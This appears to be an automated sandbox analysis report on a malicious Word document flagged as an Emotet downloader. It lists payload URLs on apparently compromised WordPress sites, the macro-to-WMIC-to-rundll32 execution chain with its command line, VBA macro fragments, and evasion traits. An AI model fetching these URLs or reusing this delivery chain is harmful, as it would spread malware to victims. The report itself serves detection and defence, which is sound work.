Source: WMIC.exe, 00000002.00000003.2138597298.0000000000423000.00000004.00000001.sdmp, WMIC.exe, 00000002.00000003.2139050094.0000000002525000.00000004.00000040.sdmp, WMIC.exe, 00000002.00000002.2385122524.0000000000250000.00000004.00000040.sdmp, WMIC.exe, 00000002.00000002.2385230898.0000000000426000.00000004.00000001.sdmp, SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc String found in binary or memory: http://sypher.biz/nx3jY0Jl.php
Source: WMIC.exe, 00000002.00000002.2390470014.0000000004CC9000.00000004.00000001.sdmp String found in binary or memory: http://sypher.biz/nx3jY0Jl.php7
Source: WMIC.exe, 00000002.00000002.2390470014.0000000004CC9000.00000004.00000001.sdmp String found in binary or memory: http://sypher.biz/nx3jY0Jl.phpbre
Source: WMIC.exe, 00000002.00000003.2138597298.0000000000423000.00000004.00000001.sdmp String found in binary or memory: http://sypher.biz/nx3jY0Jl.phpz
Source: WMIC.exe, 00000002.00000002.2391070707.0000000004F37000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2385369703.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2385492082.00000000022C7000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: WMIC.exe, 00000002.00000002.2388627093.0000000004760000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2385724336.00000000024C0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: WMIC.exe, 00000002.00000003.2138800197.0000000004D3C000.00000004.00000001.sdmp String found in binary or memory: http://www.ancert.com/cps0
Source: WMIC.exe, 00000002.00000002.2390355286.0000000004C36000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: WMIC.exe, 00000002.00000002.2387733435.0000000003423000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: WMIC.exe, 00000002.00000002.2387733435.0000000003423000.00000004.00000001.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: WMIC.exe, 00000002.00000003.2138790667.0000000004D2D000.00000004.00000001.sdmp String found in binary or memory: http://www.e-me.lv/repository0
Source: WMIC.exe, 00000002.00000002.2389961464.0000000004B50000.00000004.00000001.sdmp String found in binary or memory: http://www.e-trust.be/CPS/QNcerts
Source: WMIC.exe, 00000002.00000002.2390412134.0000000004C5B000.00000004.00000001.sdmp String found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
Source: WMIC.exe, 00000002.00000003.2138800197.0000000004D3C000.00000004.00000001.sdmp String found in binary or memory: http://www.globaltrust.info0
Source: WMIC.exe, 00000002.00000003.2138800197.0000000004D3C000.00000004.00000001.sdmp String found in binary or memory: http://www.globaltrust.info0=
Source: WMIC.exe, 00000002.00000002.2390753096.0000000004D50000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2385180708.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2385309858.00000000020E0000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: WMIC.exe, 00000002.00000002.2391070707.0000000004F37000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2385369703.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2385492082.00000000022C7000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: WMIC.exe, 00000002.00000002.2390753096.0000000004D50000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2385180708.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2385309858.00000000020E0000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: WMIC.exe, 00000002.00000003.2138935316.00000000033FB000.00000004.00000001.sdmp String found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
Source: WMIC.exe, 00000002.00000002.2390412134.0000000004C5B000.00000004.00000001.sdmp String found in binary or memory: http://www.pki.gva.es/cps0
Source: WMIC.exe, 00000002.00000002.2390412134.0000000004C5B000.00000004.00000001.sdmp String found in binary or memory: http://www.pki.gva.es/cps0%
Source: WMIC.exe, 00000002.00000003.2138779240.0000000004D11000.00000004.00000001.sdmp String found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
Source: WMIC.exe, 00000002.00000002.2390402538.0000000004C4F000.00000004.00000001.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: WMIC.exe, 00000002.00000003.2138800197.0000000004D3C000.00000004.00000001.sdmp String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: WMIC.exe, 00000002.00000003.2138890700.00000000033E5000.00000004.00000001.sdmp String found in binary or memory: http://www.valicert.com/1
Source: WMIC.exe, 00000002.00000003.2138779240.0000000004D11000.00000004.00000001.sdmp String found in binary or memory: http://www.wellsfargo.com/certpolicy0
Source: rundll32.exe, 00000006.00000002.2385309858.00000000020E0000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: WMIC.exe, 00000002.00000002.2385122524.0000000000250000.00000004.00000040.sdmp, WMIC.exe, 00000002.00000002.2385230898.0000000000426000.00000004.00000001.sdmp, SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc String found in binary or memory: https://GesDoc.fda.com.pe/wp-content/plugins/members/addons/members-acf-integration/bTXPjWEcG38.php
Source: WMIC.exe, 00000002.00000002.2389970885.0000000004B57000.00000004.00000001.sdmp String found in binary or memory: https://GesDoc.fda.com.pe/wp-content/plugins/members/addons/members-acf-integration/bTXPjWEcG38.phpA
Source: WMIC.exe, 00000002.00000003.2138597298.0000000000423000.00000004.00000001.sdmp String found in binary or memory: https://GesDoc.fda.com.pe/wp-content/plugins/members/addons/members-acf-integration/bTXPjWEcG38.phpN
Source: WMIC.exe, 00000002.00000002.2389970885.0000000004B57000.00000004.00000001.sdmp String found in binary or memory: https://GesDoc.fda.com.pe/wp-content/plugins/members/addons/members-acf-integration/bTXPjWEcG38.phpR
Source: WMIC.exe, 00000002.00000003.2138790667.0000000004D2D000.00000004.00000001.sdmp String found in binary or memory: https://cnkmovil.com/
Source: WMIC.exe, 00000002.00000002.2385122524.0000000000250000.00000004.00000040.sdmp, WMIC.exe, 00000002.00000002.2385230898.0000000000426000.00000004.00000001.sdmp, SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc String found in binary or memory: https://cnkmovil.com/wp-content/plugins/php-compatibility-checker/php52/vendor/egOIa0pQyQl3E.php
Source: WMIC.exe, 00000002.00000002.2389970885.0000000004B57000.00000004.00000001.sdmp String found in binary or memory: https://cnkmovil.com/wp-content/plugins/php-compatibility-checker/php52/vendor/egOIa0pQyQl3E.php)p
Source: WMIC.exe, 00000002.00000002.2390591212.0000000004D19000.00000004.00000001.sdmp String found in binary or memory: https://cnkmovil.com/wp-content/plugins/php-compatibility-checker/php52/vendor/egOIa0pQyQl3E.phphp
Source: WMIC.exe, 00000002.00000002.2385122524.0000000000250000.00000004.00000040.sdmp, WMIC.exe, 00000002.00000003.2138604846.0000000000428000.00000004.00000001.sdmp, SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc String found in binary or memory: https://ecologi.in/wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/OAQhv0DsS.php
Source: WMIC.exe, 00000002.00000002.2385122524.0000000000250000.00000004.00000040.sdmp, WMIC.exe, 00000002.00000003.2138604846.0000000000428000.00000004.00000001.sdmp, SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc String found in binary or memory: https://energeticpharma.com/wHkBRXop2.php
Source: WMIC.exe, 00000002.00000003.2138597298.0000000000423000.00000004.00000001.sdmp String found in binary or memory: https://energeticpharma.com/wHkBRXop2.phpl
Source: WMIC.exe, 00000002.00000003.2138790667.0000000004D2D000.00000004.00000001.sdmp String found in binary or memory: https://gesdoc.fda.com.pe/a
Source: WMIC.exe, 00000002.00000003.2138790667.0000000004D2D000.00000004.00000001.sdmp String found in binary or memory: https://gesdoc.fda.com.pe/m
Source: WMIC.exe, 00000002.00000003.2139050094.0000000002525000.00000004.00000040.sdmp, WMIC.exe, 00000002.00000002.2389970885.0000000004B57000.00000004.00000001.sdmp String found in binary or memory: https://gesdoc.fda.com.pe/wp-content/plugins/members/addons/members-acf-integration/bTXPjWEcG38.php
Source: WMIC.exe, 00000002.00000002.2389970885.0000000004B57000.00000004.00000001.sdmp String found in binary or memory: https://gesdoc.fda.com.pe/wp-content/plugins/members/addons/members-acf-integration/bTXPjWEcG38.phpf
Source: WMIC.exe, 00000002.00000002.2389970885.0000000004B57000.00000004.00000001.sdmp String found in binary or memory: https://gesdoc.fda.com.pe/wp-content/plugins/members/addons/members-acf-integration/bTXPjWEcG38.phpk
Source: WMIC.exe, 00000002.00000002.2385122524.0000000000250000.00000004.00000040.sdmp, WMIC.exe, 00000002.00000003.2138604846.0000000000428000.00000004.00000001.sdmp, SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc String found in binary or memory: https://mpcleaning.com.ng/bV7QVXR3xEb9K.php
Source: WMIC.exe, 00000002.00000002.2390402538.0000000004C4F000.00000004.00000001.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: WMIC.exe, 00000002.00000003.2138939694.0000000003402000.00000004.00000001.sdmp, WMIC.exe, 00000002.00000002.2390608354.0000000004D1F000.00000004.00000001.sdmp String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: WMIC.exe, 00000002.00000003.2138890700.00000000033E5000.00000004.00000001.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: WMIC.exe, 00000002.00000002.2387605507.000000000340E000.00000004.00000001.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: WMIC.exe, 00000002.00000003.2138877911.00000000033C0000.00000004.00000001.sdmp String found in binary or memory: https://wellnessway.co.za/
Source: WMIC.exe, 00000002.00000003.2138790667.0000000004D2D000.00000004.00000001.sdmp String found in binary or memory: https://wellnessway.co.za/A
Source: WMIC.exe, 00000002.00000003.2138790667.0000000004D2D000.00000004.00000001.sdmp String found in binary or memory: https://wellnessway.co.za/M
Source: WMIC.exe, 00000002.00000003.2138877911.00000000033C0000.00000004.00000001.sdmp String found in binary or memory: https://wellnessway.co.za/rPKiM
Source: WMIC.exe, 00000002.00000002.2385171774.000000000036D000.00000004.00000020.sdmp, SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc String found in binary or memory: https://wellnessway.co.za/wp-content/plugins/coming-soon-maintenance-mode-from-acurax/css/fonts/x90P
Source: WMIC.exe, 00000002.00000002.2385122524.0000000000250000.00000004.00000040.sdmp, WMIC.exe, 00000002.00000003.2138604846.0000000000428000.00000004.00000001.sdmp, SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc String found in binary or memory: https://www.blackoutthebox.com/wp-content/plugins/woocommerce/src/Admin/B9PqY5aXdcv.php
Source: WMIC.exe, 00000002.00000003.2138800197.0000000004D3C000.00000004.00000001.sdmp String found in binary or memory: https://www.catcert.net/verarrel
Source: WMIC.exe, 00000002.00000003.2138800197.0000000004D3C000.00000004.00000001.sdmp String found in binary or memory: https://www.catcert.net/verarrel05
Source: WMIC.exe, 00000002.00000003.2138865654.000000000339D000.00000004.00000001.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: WMIC.exe, 00000002.00000002.2390470014.0000000004CC9000.00000004.00000001.sdmp String found in binary or memory: https://www.wellnessway.co.za/
Source: WMIC.exe, 00000002.00000002.2390470014.0000000004CC9000.00000004.00000001.sdmp String found in binary or memory: https://www.wellnessway.co.za/tCA
Source: WMIC.exe, 00000002.00000002.2385171774.000000000036D000.00000004.00000020.sdmp String found in binary or memory: https://www.wellnessway.co.za/wp-content/plugins/coming-soon-maintenance-mode-from-acurax/css/fonts/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49173 -> 443

E-Banking Fraud:

Drops certificate files (DER)
Source: C:\Windows\System32\wbem\WMIC.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A Jump to dropped file

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Content" for details. I t3 I a C a
Source: Screenshot number: 8 Screenshot OCR: Enable Content" for details. a S G N)! M O I @ 100% G) A GE)
Source: Document image extraction number: 0 Screenshot OCR: Enable Content" for details.
Source: Document image extraction number: 1 Screenshot OCR: Enable Content" for details.
Document contains an embedded VBA macro which may execute processes
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc OLE, VBA macro line: Set jBPHs4UaRM88Lm0l0yxIUb2Zyjho = GetObject(nRUWmhFh_vBMyyo).SpawnInstance_
Document contains an embedded VBA macro with suspicious strings
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc OLE, VBA macro line: Uo0Woz8c0Qoh03pjFxeJH = Environ(AFSyZelG_DtOj1n_IPw2ec.mijI8TkU_dOsoDuF)
Document contains an embedded macro with GUI obfuscation
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc Stream path 'Macros/Qww0ixVjApBVEBYdavi9/o' : Found suspicious string activexobject in non macro stream
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_7094072C NtDelayExecution, 6_2_7094072C
Creates files inside the system directory
Source: C:\Windows\System32\wbem\WMIC.exe File created: C:\Windows\Temp\5xta3.dll Jump to behavior
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_70931494 6_2_70931494
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_7093A444 6_2_7093A444
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_70938460 6_2_70938460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_70940D9C 6_2_70940D9C
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc OLE, VBA macro line: Private Sub Document_Open()
Document contains embedded VBA macros
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc OLE indicator, VBA macros: true
Source: WMIC.exe, 00000002.00000002.2390753096.0000000004D50000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2385180708.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2385309858.00000000020E0000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal92.expl.evad.winDOC@6/16@9/6
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$curiteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRCABD.tmp Jump to behavior
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc OLE indicator, Word Document stream: true
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc OLE document summary: title field not present or empty
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc OLE document summary: author field not present or empty
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc OLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:/Windows/Temp//5xta3.dll DllRegisterServer
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc Virustotal: Detection: 43%
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc ReversingLabs: Detection: 31%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\wbem\WMIC.exe Wmic
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:/Windows/Temp//5xta3.dll DllRegisterServer
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:/Windows/Temp//5xta3.dll DllRegisterServer
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:/Windows/Temp//5xta3.dll DllRegisterServer Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:/Windows/Temp//5xta3.dll DllRegisterServer Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Window found: window name: SysTabControl32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: EFRE65.pdb source: WMIC.exe, 00000002.00000003.2138517902.0000000002534000.00000004.00000001.sdmp, 5xta3.dll.2.dr
Source: Binary string: S:\Work\_bin\Release-Win32\ldr.pdb source: rundll32.exe, 00000006.00000002.2386305628.0000000070948000.00000002.00020000.sdmp

Data Obfuscation:

Document contains an embedded VBA with many randomly named variables
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc Stream path 'Macros/VBA/mjNuSqzTfoVromx' : High entropy of concatenated variable names
Document contains an embedded VBA with many string operations indicating source code obfuscation
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc Stream path 'Macros/VBA/Qww0ixVjApBVEBYdavi9' : High number of string operations
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_7093F68C push esi; mov dword ptr [esp], 00000000h 6_2_7093F68D

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\wbem\WMIC.exe File created: C:\Windows\Temp\5xta3.dll Jump to dropped file
Source: C:\Windows\System32\wbem\WMIC.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\q3H69D5AKRPk[1].php Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\System32\wbem\WMIC.exe File created: C:\Windows\Temp\5xta3.dll Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wbem\WMIC.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\q3H69D5AKRPk[1].php Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: SecuriteInfo.com.VB.Heur.EmoDldr.32.1ED8B2A0.Gen.1653.doc Stream path 'Data' entropy: 7.97709464434 (max. 8.0)

Malware Analysis System Evasion:

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 435 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\wbem\WMIC.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\q3H69D5AKRPk[1].php Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wbem\WMIC.exe TID: 2028 Thread sleep time: -180000s >= -30000s Jump to behavior
